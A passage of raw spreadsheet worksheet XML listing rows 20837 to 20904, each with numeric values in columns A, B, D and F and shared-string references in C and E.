      <c r="C20837" s="2" t="s">
        <v>20106</v>
      </c>
      <c r="D20837" s="2">
        <v>1.0</v>
      </c>
      <c r="E20837" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20837" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20838" ht="15.75" customHeight="1">
      <c r="A20838" s="1">
        <v>4361.0</v>
      </c>
      <c r="B20838" s="2">
        <v>4.2120145E7</v>
      </c>
      <c r="C20838" s="2" t="s">
        <v>20107</v>
      </c>
      <c r="D20838" s="2">
        <v>1.0</v>
      </c>
      <c r="E20838" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20838" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20839" ht="15.75" customHeight="1">
      <c r="A20839" s="1">
        <v>4523.0</v>
      </c>
      <c r="B20839" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C20839" s="2" t="s">
        <v>20108</v>
      </c>
      <c r="D20839" s="2">
        <v>1.0</v>
      </c>
      <c r="E20839" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20839" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20840" ht="15.75" customHeight="1">
      <c r="A20840" s="1">
        <v>4876.0</v>
      </c>
      <c r="B20840" s="2">
        <v>4.385039E7</v>
      </c>
      <c r="C20840" s="2" t="s">
        <v>20109</v>
      </c>
      <c r="D20840" s="2">
        <v>1.0</v>
      </c>
      <c r="E20840" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20840" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20841" ht="15.75" customHeight="1">
      <c r="A20841" s="1">
        <v>5144.0</v>
      </c>
      <c r="B20841" s="2">
        <v>4.4654431E7</v>
      </c>
      <c r="C20841" s="2" t="s">
        <v>20110</v>
      </c>
      <c r="D20841" s="2">
        <v>1.0</v>
      </c>
      <c r="E20841" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20841" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20842" ht="15.75" customHeight="1">
      <c r="A20842" s="1">
        <v>5376.0</v>
      </c>
      <c r="B20842" s="2">
        <v>4.5397319E7</v>
      </c>
      <c r="C20842" s="2" t="s">
        <v>20111</v>
      </c>
      <c r="D20842" s="2">
        <v>1.0</v>
      </c>
      <c r="E20842" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20842" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20843" ht="15.75" customHeight="1">
      <c r="A20843" s="1">
        <v>5402.0</v>
      </c>
      <c r="B20843" s="2">
        <v>4.5494598E7</v>
      </c>
      <c r="C20843" s="2" t="s">
        <v>20112</v>
      </c>
      <c r="D20843" s="2">
        <v>1.0</v>
      </c>
      <c r="E20843" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20843" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20844" ht="15.75" customHeight="1">
      <c r="A20844" s="1">
        <v>5520.0</v>
      </c>
      <c r="B20844" s="2">
        <v>4.5856043E7</v>
      </c>
      <c r="C20844" s="2" t="s">
        <v>20113</v>
      </c>
      <c r="D20844" s="2">
        <v>1.0</v>
      </c>
      <c r="E20844" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20844" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20845" ht="15.75" customHeight="1">
      <c r="A20845" s="1">
        <v>5671.0</v>
      </c>
      <c r="B20845" s="2">
        <v>4.6335973E7</v>
      </c>
      <c r="C20845" s="2" t="s">
        <v>20114</v>
      </c>
      <c r="D20845" s="2">
        <v>1.0</v>
      </c>
      <c r="E20845" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20845" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20846" ht="15.75" customHeight="1">
      <c r="A20846" s="1">
        <v>5736.0</v>
      </c>
      <c r="B20846" s="2">
        <v>4.6613231E7</v>
      </c>
      <c r="C20846" s="2" t="s">
        <v>20115</v>
      </c>
      <c r="D20846" s="2">
        <v>1.0</v>
      </c>
      <c r="E20846" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20846" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20847" ht="15.75" customHeight="1">
      <c r="A20847" s="1">
        <v>5747.0</v>
      </c>
      <c r="B20847" s="2">
        <v>4.6644912E7</v>
      </c>
      <c r="C20847" s="2" t="s">
        <v>20116</v>
      </c>
      <c r="D20847" s="2">
        <v>1.0</v>
      </c>
      <c r="E20847" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20847" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20848" ht="15.75" customHeight="1">
      <c r="A20848" s="1">
        <v>5850.0</v>
      </c>
      <c r="B20848" s="2">
        <v>4.6935345E7</v>
      </c>
      <c r="C20848" s="2" t="s">
        <v>20117</v>
      </c>
      <c r="D20848" s="2">
        <v>1.0</v>
      </c>
      <c r="E20848" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20848" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20849" ht="15.75" customHeight="1">
      <c r="A20849" s="1">
        <v>5984.0</v>
      </c>
      <c r="B20849" s="2">
        <v>4.7407492E7</v>
      </c>
      <c r="C20849" s="2" t="s">
        <v>20118</v>
      </c>
      <c r="D20849" s="2">
        <v>1.0</v>
      </c>
      <c r="E20849" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20849" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20850" ht="15.75" customHeight="1">
      <c r="A20850" s="1">
        <v>5990.0</v>
      </c>
      <c r="B20850" s="2">
        <v>4.743396E7</v>
      </c>
      <c r="C20850" s="2" t="s">
        <v>20119</v>
      </c>
      <c r="D20850" s="2">
        <v>1.0</v>
      </c>
      <c r="E20850" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20850" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20851" ht="15.75" customHeight="1">
      <c r="A20851" s="1">
        <v>6222.0</v>
      </c>
      <c r="B20851" s="2">
        <v>4.802478E7</v>
      </c>
      <c r="C20851" s="2" t="s">
        <v>20120</v>
      </c>
      <c r="D20851" s="2">
        <v>1.0</v>
      </c>
      <c r="E20851" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20851" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20852" ht="15.75" customHeight="1">
      <c r="A20852" s="1">
        <v>6428.0</v>
      </c>
      <c r="B20852" s="2">
        <v>4.8562411E7</v>
      </c>
      <c r="C20852" s="2" t="s">
        <v>20121</v>
      </c>
      <c r="D20852" s="2">
        <v>1.0</v>
      </c>
      <c r="E20852" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20852" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20853" ht="15.75" customHeight="1">
      <c r="A20853" s="1">
        <v>6621.0</v>
      </c>
      <c r="B20853" s="2">
        <v>4.904879E7</v>
      </c>
      <c r="C20853" s="2" t="s">
        <v>20122</v>
      </c>
      <c r="D20853" s="2">
        <v>1.0</v>
      </c>
      <c r="E20853" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20853" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20854" ht="15.75" customHeight="1">
      <c r="A20854" s="1">
        <v>6843.0</v>
      </c>
      <c r="B20854" s="2">
        <v>4.9622755E7</v>
      </c>
      <c r="C20854" s="2" t="s">
        <v>20123</v>
      </c>
      <c r="D20854" s="2">
        <v>1.0</v>
      </c>
      <c r="E20854" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20854" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20855" ht="15.75" customHeight="1">
      <c r="A20855" s="1">
        <v>6977.0</v>
      </c>
      <c r="B20855" s="2">
        <v>5.0025641E7</v>
      </c>
      <c r="C20855" s="2" t="s">
        <v>20124</v>
      </c>
      <c r="D20855" s="2">
        <v>1.0</v>
      </c>
      <c r="E20855" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20855" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20856" ht="15.75" customHeight="1">
      <c r="A20856" s="1">
        <v>7174.0</v>
      </c>
      <c r="B20856" s="2">
        <v>5.0552908E7</v>
      </c>
      <c r="C20856" s="2" t="s">
        <v>20125</v>
      </c>
      <c r="D20856" s="2">
        <v>1.0</v>
      </c>
      <c r="E20856" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20856" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20857" ht="15.75" customHeight="1">
      <c r="A20857" s="1">
        <v>7212.0</v>
      </c>
      <c r="B20857" s="2">
        <v>5.0624709E7</v>
      </c>
      <c r="C20857" s="2" t="s">
        <v>20126</v>
      </c>
      <c r="D20857" s="2">
        <v>1.0</v>
      </c>
      <c r="E20857" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20857" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20858" ht="15.75" customHeight="1">
      <c r="A20858" s="1">
        <v>7214.0</v>
      </c>
      <c r="B20858" s="2">
        <v>5.0624709E7</v>
      </c>
      <c r="C20858" s="2" t="s">
        <v>20127</v>
      </c>
      <c r="D20858" s="2">
        <v>1.0</v>
      </c>
      <c r="E20858" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20858" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20859" ht="15.75" customHeight="1">
      <c r="A20859" s="1">
        <v>7219.0</v>
      </c>
      <c r="B20859" s="2">
        <v>5.0639809E7</v>
      </c>
      <c r="C20859" s="2" t="s">
        <v>20128</v>
      </c>
      <c r="D20859" s="2">
        <v>1.0</v>
      </c>
      <c r="E20859" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20859" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20860" ht="15.75" customHeight="1">
      <c r="A20860" s="1">
        <v>7241.0</v>
      </c>
      <c r="B20860" s="2">
        <v>5.0686798E7</v>
      </c>
      <c r="C20860" s="2" t="s">
        <v>20129</v>
      </c>
      <c r="D20860" s="2">
        <v>1.0</v>
      </c>
      <c r="E20860" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20860" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20861" ht="15.75" customHeight="1">
      <c r="A20861" s="1">
        <v>7247.0</v>
      </c>
      <c r="B20861" s="2">
        <v>5.0704086E7</v>
      </c>
      <c r="C20861" s="2" t="s">
        <v>20130</v>
      </c>
      <c r="D20861" s="2">
        <v>1.0</v>
      </c>
      <c r="E20861" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20861" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20862" ht="15.75" customHeight="1">
      <c r="A20862" s="1">
        <v>7714.0</v>
      </c>
      <c r="B20862" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C20862" s="2" t="s">
        <v>20131</v>
      </c>
      <c r="D20862" s="2">
        <v>1.0</v>
      </c>
      <c r="E20862" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20862" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20863" ht="15.75" customHeight="1">
      <c r="A20863" s="1">
        <v>7837.0</v>
      </c>
      <c r="B20863" s="2">
        <v>5.2322113E7</v>
      </c>
      <c r="C20863" s="2" t="s">
        <v>20132</v>
      </c>
      <c r="D20863" s="2">
        <v>1.0</v>
      </c>
      <c r="E20863" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20863" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20864" ht="15.75" customHeight="1">
      <c r="A20864" s="1">
        <v>7945.0</v>
      </c>
      <c r="B20864" s="2">
        <v>5.2634678E7</v>
      </c>
      <c r="C20864" s="2" t="s">
        <v>20133</v>
      </c>
      <c r="D20864" s="2">
        <v>1.0</v>
      </c>
      <c r="E20864" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20864" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20865" ht="15.75" customHeight="1">
      <c r="A20865" s="1">
        <v>8096.0</v>
      </c>
      <c r="B20865" s="2">
        <v>5.3059581E7</v>
      </c>
      <c r="C20865" s="2" t="s">
        <v>20134</v>
      </c>
      <c r="D20865" s="2">
        <v>1.0</v>
      </c>
      <c r="E20865" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20865" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20866" ht="15.75" customHeight="1">
      <c r="A20866" s="1">
        <v>8299.0</v>
      </c>
      <c r="B20866" s="2">
        <v>5.3551764E7</v>
      </c>
      <c r="C20866" s="2" t="s">
        <v>20135</v>
      </c>
      <c r="D20866" s="2">
        <v>1.0</v>
      </c>
      <c r="E20866" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20866" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20867" ht="15.75" customHeight="1">
      <c r="A20867" s="1">
        <v>8363.0</v>
      </c>
      <c r="B20867" s="2">
        <v>5.3784501E7</v>
      </c>
      <c r="C20867" s="2" t="s">
        <v>20136</v>
      </c>
      <c r="D20867" s="2">
        <v>1.0</v>
      </c>
      <c r="E20867" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20867" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20868" ht="15.75" customHeight="1">
      <c r="A20868" s="1">
        <v>8459.0</v>
      </c>
      <c r="B20868" s="2">
        <v>5.4003799E7</v>
      </c>
      <c r="C20868" s="2" t="s">
        <v>20137</v>
      </c>
      <c r="D20868" s="2">
        <v>1.0</v>
      </c>
      <c r="E20868" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20868" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20869" ht="15.75" customHeight="1">
      <c r="A20869" s="1">
        <v>8669.0</v>
      </c>
      <c r="B20869" s="2">
        <v>5.4373584E7</v>
      </c>
      <c r="C20869" s="2" t="s">
        <v>20138</v>
      </c>
      <c r="D20869" s="2">
        <v>1.0</v>
      </c>
      <c r="E20869" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20869" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20870" ht="15.75" customHeight="1">
      <c r="A20870" s="1">
        <v>8683.0</v>
      </c>
      <c r="B20870" s="2">
        <v>5.440523E7</v>
      </c>
      <c r="C20870" s="2" t="s">
        <v>20139</v>
      </c>
      <c r="D20870" s="2">
        <v>1.0</v>
      </c>
      <c r="E20870" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20870" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20871" ht="15.75" customHeight="1">
      <c r="A20871" s="1">
        <v>8797.0</v>
      </c>
      <c r="B20871" s="2">
        <v>5.4607524E7</v>
      </c>
      <c r="C20871" s="2" t="s">
        <v>20140</v>
      </c>
      <c r="D20871" s="2">
        <v>1.0</v>
      </c>
      <c r="E20871" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20871" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20872" ht="15.75" customHeight="1">
      <c r="A20872" s="1">
        <v>9058.0</v>
      </c>
      <c r="B20872" s="2">
        <v>5.5103062E7</v>
      </c>
      <c r="C20872" s="2" t="s">
        <v>20141</v>
      </c>
      <c r="D20872" s="2">
        <v>1.0</v>
      </c>
      <c r="E20872" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20872" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20873" ht="15.75" customHeight="1">
      <c r="A20873" s="1">
        <v>9185.0</v>
      </c>
      <c r="B20873" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C20873" s="2" t="s">
        <v>20142</v>
      </c>
      <c r="D20873" s="2">
        <v>1.0</v>
      </c>
      <c r="E20873" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20873" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20874" ht="15.75" customHeight="1">
      <c r="A20874" s="1">
        <v>9590.0</v>
      </c>
      <c r="B20874" s="2">
        <v>5.6100924E7</v>
      </c>
      <c r="C20874" s="2" t="s">
        <v>20143</v>
      </c>
      <c r="D20874" s="2">
        <v>1.0</v>
      </c>
      <c r="E20874" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20874" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20875" ht="15.75" customHeight="1">
      <c r="A20875" s="1">
        <v>9901.0</v>
      </c>
      <c r="B20875" s="2">
        <v>5.6771662E7</v>
      </c>
      <c r="C20875" s="2" t="s">
        <v>20144</v>
      </c>
      <c r="D20875" s="2">
        <v>1.0</v>
      </c>
      <c r="E20875" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20875" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20876" ht="15.75" customHeight="1">
      <c r="A20876" s="1">
        <v>9985.0</v>
      </c>
      <c r="B20876" s="2">
        <v>5.6965968E7</v>
      </c>
      <c r="C20876" s="2" t="s">
        <v>20145</v>
      </c>
      <c r="D20876" s="2">
        <v>1.0</v>
      </c>
      <c r="E20876" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20876" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20877" ht="15.75" customHeight="1">
      <c r="A20877" s="1">
        <v>10201.0</v>
      </c>
      <c r="B20877" s="2">
        <v>5.740268E7</v>
      </c>
      <c r="C20877" s="2" t="s">
        <v>20146</v>
      </c>
      <c r="D20877" s="2">
        <v>1.0</v>
      </c>
      <c r="E20877" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20877" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20878" ht="15.75" customHeight="1">
      <c r="A20878" s="1">
        <v>10361.0</v>
      </c>
      <c r="B20878" s="2">
        <v>7770973.0</v>
      </c>
      <c r="C20878" s="2" t="s">
        <v>20147</v>
      </c>
      <c r="D20878" s="2">
        <v>1.0</v>
      </c>
      <c r="E20878" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20878" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20879" ht="15.75" customHeight="1">
      <c r="A20879" s="1">
        <v>10381.0</v>
      </c>
      <c r="B20879" s="2">
        <v>8190782.0</v>
      </c>
      <c r="C20879" s="2" t="s">
        <v>20148</v>
      </c>
      <c r="D20879" s="2">
        <v>1.0</v>
      </c>
      <c r="E20879" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20879" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20880" ht="15.75" customHeight="1">
      <c r="A20880" s="1">
        <v>10429.0</v>
      </c>
      <c r="B20880" s="2">
        <v>1.0334645E7</v>
      </c>
      <c r="C20880" s="2" t="s">
        <v>20149</v>
      </c>
      <c r="D20880" s="2">
        <v>1.0</v>
      </c>
      <c r="E20880" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20880" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20881" ht="15.75" customHeight="1">
      <c r="A20881" s="1">
        <v>10942.0</v>
      </c>
      <c r="B20881" s="2">
        <v>1.7068152E7</v>
      </c>
      <c r="C20881" s="2" t="s">
        <v>20150</v>
      </c>
      <c r="D20881" s="2">
        <v>1.0</v>
      </c>
      <c r="E20881" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20881" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20882" ht="15.75" customHeight="1">
      <c r="A20882" s="1">
        <v>11152.0</v>
      </c>
      <c r="B20882" s="2">
        <v>1.9387632E7</v>
      </c>
      <c r="C20882" s="2" t="s">
        <v>20151</v>
      </c>
      <c r="D20882" s="2">
        <v>1.0</v>
      </c>
      <c r="E20882" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20882" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20883" ht="15.75" customHeight="1">
      <c r="A20883" s="1">
        <v>11397.0</v>
      </c>
      <c r="B20883" s="2">
        <v>2.1583573E7</v>
      </c>
      <c r="C20883" s="2" t="s">
        <v>20152</v>
      </c>
      <c r="D20883" s="2">
        <v>1.0</v>
      </c>
      <c r="E20883" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20883" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20884" ht="15.75" customHeight="1">
      <c r="A20884" s="1">
        <v>11578.0</v>
      </c>
      <c r="B20884" s="2">
        <v>2.2793139E7</v>
      </c>
      <c r="C20884" s="2" t="s">
        <v>20153</v>
      </c>
      <c r="D20884" s="2">
        <v>1.0</v>
      </c>
      <c r="E20884" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20884" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20885" ht="15.75" customHeight="1">
      <c r="A20885" s="1">
        <v>11660.0</v>
      </c>
      <c r="B20885" s="2">
        <v>2.3342813E7</v>
      </c>
      <c r="C20885" s="2" t="s">
        <v>20154</v>
      </c>
      <c r="D20885" s="2">
        <v>1.0</v>
      </c>
      <c r="E20885" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20885" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20886" ht="15.75" customHeight="1">
      <c r="A20886" s="1">
        <v>11901.0</v>
      </c>
      <c r="B20886" s="2">
        <v>2.5185348E7</v>
      </c>
      <c r="C20886" s="2" t="s">
        <v>20155</v>
      </c>
      <c r="D20886" s="2">
        <v>1.0</v>
      </c>
      <c r="E20886" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20886" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20887" ht="15.75" customHeight="1">
      <c r="A20887" s="1">
        <v>11933.0</v>
      </c>
      <c r="B20887" s="2">
        <v>2.5451464E7</v>
      </c>
      <c r="C20887" s="2" t="s">
        <v>20156</v>
      </c>
      <c r="D20887" s="2">
        <v>1.0</v>
      </c>
      <c r="E20887" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20887" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20888" ht="15.75" customHeight="1">
      <c r="A20888" s="1">
        <v>12025.0</v>
      </c>
      <c r="B20888" s="2">
        <v>2.6123099E7</v>
      </c>
      <c r="C20888" s="2" t="s">
        <v>20157</v>
      </c>
      <c r="D20888" s="2">
        <v>1.0</v>
      </c>
      <c r="E20888" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20888" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20889" ht="15.75" customHeight="1">
      <c r="A20889" s="1">
        <v>12032.0</v>
      </c>
      <c r="B20889" s="2">
        <v>2.6250406E7</v>
      </c>
      <c r="C20889" s="2" t="s">
        <v>20158</v>
      </c>
      <c r="D20889" s="2">
        <v>1.0</v>
      </c>
      <c r="E20889" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20889" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20890" ht="15.75" customHeight="1">
      <c r="A20890" s="1">
        <v>12328.0</v>
      </c>
      <c r="B20890" s="2">
        <v>2.8526654E7</v>
      </c>
      <c r="C20890" s="2" t="s">
        <v>20159</v>
      </c>
      <c r="D20890" s="2">
        <v>1.0</v>
      </c>
      <c r="E20890" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20890" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20891" ht="15.75" customHeight="1">
      <c r="A20891" s="1">
        <v>13285.0</v>
      </c>
      <c r="B20891" s="2">
        <v>3.442812E7</v>
      </c>
      <c r="C20891" s="2" t="s">
        <v>20160</v>
      </c>
      <c r="D20891" s="2">
        <v>1.0</v>
      </c>
      <c r="E20891" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20891" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20892" ht="15.75" customHeight="1">
      <c r="A20892" s="1">
        <v>13305.0</v>
      </c>
      <c r="B20892" s="2">
        <v>3.4512974E7</v>
      </c>
      <c r="C20892" s="2" t="s">
        <v>20161</v>
      </c>
      <c r="D20892" s="2">
        <v>1.0</v>
      </c>
      <c r="E20892" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20892" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20893" ht="15.75" customHeight="1">
      <c r="A20893" s="1">
        <v>13346.0</v>
      </c>
      <c r="B20893" s="2">
        <v>3.4694622E7</v>
      </c>
      <c r="C20893" s="2" t="s">
        <v>20162</v>
      </c>
      <c r="D20893" s="2">
        <v>1.0</v>
      </c>
      <c r="E20893" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20893" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20894" ht="15.75" customHeight="1">
      <c r="A20894" s="1">
        <v>13420.0</v>
      </c>
      <c r="B20894" s="2">
        <v>3.5064346E7</v>
      </c>
      <c r="C20894" s="2" t="s">
        <v>20163</v>
      </c>
      <c r="D20894" s="2">
        <v>1.0</v>
      </c>
      <c r="E20894" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20894" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20895" ht="15.75" customHeight="1">
      <c r="A20895" s="1">
        <v>13797.0</v>
      </c>
      <c r="B20895" s="2">
        <v>3.6610254E7</v>
      </c>
      <c r="C20895" s="2" t="s">
        <v>20164</v>
      </c>
      <c r="D20895" s="2">
        <v>1.0</v>
      </c>
      <c r="E20895" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20895" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20896" ht="15.75" customHeight="1">
      <c r="A20896" s="1">
        <v>13832.0</v>
      </c>
      <c r="B20896" s="2">
        <v>3.6775661E7</v>
      </c>
      <c r="C20896" s="2" t="s">
        <v>20165</v>
      </c>
      <c r="D20896" s="2">
        <v>1.0</v>
      </c>
      <c r="E20896" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20896" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20897" ht="15.75" customHeight="1">
      <c r="A20897" s="1">
        <v>13935.0</v>
      </c>
      <c r="B20897" s="2">
        <v>3.7139139E7</v>
      </c>
      <c r="C20897" s="2" t="s">
        <v>20166</v>
      </c>
      <c r="D20897" s="2">
        <v>1.0</v>
      </c>
      <c r="E20897" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20897" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20898" ht="15.75" customHeight="1">
      <c r="A20898" s="1">
        <v>14017.0</v>
      </c>
      <c r="B20898" s="2">
        <v>3.7467232E7</v>
      </c>
      <c r="C20898" s="2" t="s">
        <v>20167</v>
      </c>
      <c r="D20898" s="2">
        <v>1.0</v>
      </c>
      <c r="E20898" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20898" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20899" ht="15.75" customHeight="1">
      <c r="A20899" s="1">
        <v>14082.0</v>
      </c>
      <c r="B20899" s="2">
        <v>3.7683691E7</v>
      </c>
      <c r="C20899" s="2" t="s">
        <v>20168</v>
      </c>
      <c r="D20899" s="2">
        <v>1.0</v>
      </c>
      <c r="E20899" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20899" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20900" ht="15.75" customHeight="1">
      <c r="A20900" s="1">
        <v>14347.0</v>
      </c>
      <c r="B20900" s="2">
        <v>3.8865582E7</v>
      </c>
      <c r="C20900" s="2" t="s">
        <v>20169</v>
      </c>
      <c r="D20900" s="2">
        <v>1.0</v>
      </c>
      <c r="E20900" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20900" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20901" ht="15.75" customHeight="1">
      <c r="A20901" s="1">
        <v>14752.0</v>
      </c>
      <c r="B20901" s="2">
        <v>4.0761176E7</v>
      </c>
      <c r="C20901" s="2" t="s">
        <v>20170</v>
      </c>
      <c r="D20901" s="2">
        <v>1.0</v>
      </c>
      <c r="E20901" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20901" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20902" ht="15.75" customHeight="1">
      <c r="A20902" s="1">
        <v>14877.0</v>
      </c>
      <c r="B20902" s="2">
        <v>4.1080493E7</v>
      </c>
      <c r="C20902" s="2" t="s">
        <v>20171</v>
      </c>
      <c r="D20902" s="2">
        <v>1.0</v>
      </c>
      <c r="E20902" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20902" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20903" ht="15.75" customHeight="1">
      <c r="A20903" s="1">
        <v>15010.0</v>
      </c>
      <c r="B20903" s="2">
        <v>4.1474738E7</v>
      </c>
      <c r="C20903" s="2" t="s">
        <v>20172</v>
      </c>
      <c r="D20903" s="2">
        <v>1.0</v>
      </c>
      <c r="E20903" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20903" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20904" ht="15.75" customHeight="1">
      <c r="A20904" s="1">
        <v>15189.0</v>
      </c>
      <c r="B20904" s="2">
        <v>4.2037271E7</v>
      </c>
